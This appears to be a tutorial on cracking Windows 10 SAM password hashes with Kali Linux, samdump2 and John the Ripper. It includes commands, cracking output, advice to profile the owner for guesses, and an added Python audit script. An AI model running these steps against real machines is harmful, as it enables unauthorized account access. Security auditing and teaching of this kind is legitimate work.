Break Windows 10 password hashes with Kali Linux and John the Ripper
Cracking the SAM file in Windows 10 is easy with Kali Linux. Use a Live Kali Linux DVD and mount the Windows 10 partition.
Firstly, get the SAM and SYSTEM files from the C:\Windows\System32\config folder. Copy these to your desktop directory.
Then dump the password hashes.
root@kali:~/Desktop# samdump2 SYSTEM SAM -o out
Now grab the rockyou.txt wordlist.
root@kali:~/Desktop# zcat /usr/share/wordlists/rockyou.txt.gz > rock.txt
Now I am attempting to crack the Windows user password.
root@kali:~/Desktop# john out --format=nt --wordlist=rock.txt
If this is successful, this output should be printed, or something like this…
Warning: invalid UTF-8 seen reading rock.txt
Using default input encoding: UTF-8
Loaded 54 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
password ()
 (*disabled* Administrator)
2g 0:00:00:00 DONE (2016-03-24 12:30) 200.0g/s 354600p/s 354600c/s 18442KC/s dirk..sss
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Now cat the john.pot file; it should contain the cracked passwords.
root@kali:~/Desktop# cat ~/.john/john.pot
$NT$8846f7eaee8fb117ad06bdd830b7586c:password
$NT$31d6cfe0d16ae931b73c59d7e0c089c0:
If the password is in the wordlist, it should be cracked. This is easy, but the wordlist needs to be very large indeed to increase the possibility of cracking the password. Get as much information about the computer owner as possible. They might have used the name of their pet or loved one😳.
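To turn the dump and john.pot into an account-by-account audit, the script below joins the two files and reports which accounts have a blank or wordlist password, without printing the plaintext. It is an added example, not part of the original post; the alice and bob accounts and bob's hash are constructed sample data, and the dump layout assumes samdump2's user:RID:LM:NT::: lines.

```python
# Added example: password audit over samdump2 output and john.pot.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
DISABLED = "*disabled* "                       # prefix samdump2 puts on disabled accounts

# Constructed samdump2-style dump: user:RID:LM hash:NT hash:::
SAMPLE_DUMP = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
bob:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""
# The two john.pot lines shown on this page.
SAMPLE_POT = """\
$NT$8846f7eaee8fb117ad06bdd830b7586c:password
$NT$31d6cfe0d16ae931b73c59d7e0c089c0:
"""

def parse_pot(text):
    """Return the set of NT hashes that john.pot records as cracked."""
    cracked = set()
    for line in text.splitlines():
        if line.startswith("$NT$"):
            # The hash contains no ':', so split on the first one only;
            # the password after it may contain further colons.
            nt_hash, _, _password = line[4:].partition(":")
            cracked.add(nt_hash.lower())
    return cracked

def audit(dump_text, pot_text):
    """Classify each account as blank, cracked or not cracked."""
    cracked = parse_pot(pot_text)
    report = []
    for line in dump_text.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue  # not a user:RID:LM:NT line
        user, nt_hash = fields[0], fields[3].lower()
        enabled = not user.startswith(DISABLED)
        if not enabled:
            user = user[len(DISABLED):]
        if nt_hash == EMPTY_NT:
            status = "blank"
        elif nt_hash in cracked:
            status = "cracked"
        else:
            status = "not cracked"
        report.append((user, enabled, status))
    return report

if __name__ == "__main__":
    for user, enabled, status in audit(SAMPLE_DUMP, SAMPLE_POT):
        print(f"{user:15} enabled={enabled!s:5} {status}")
```

Enabled accounts reported as blank or cracked are the ones that need a password change.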
There is a directory here; it contains a few very large wordlists.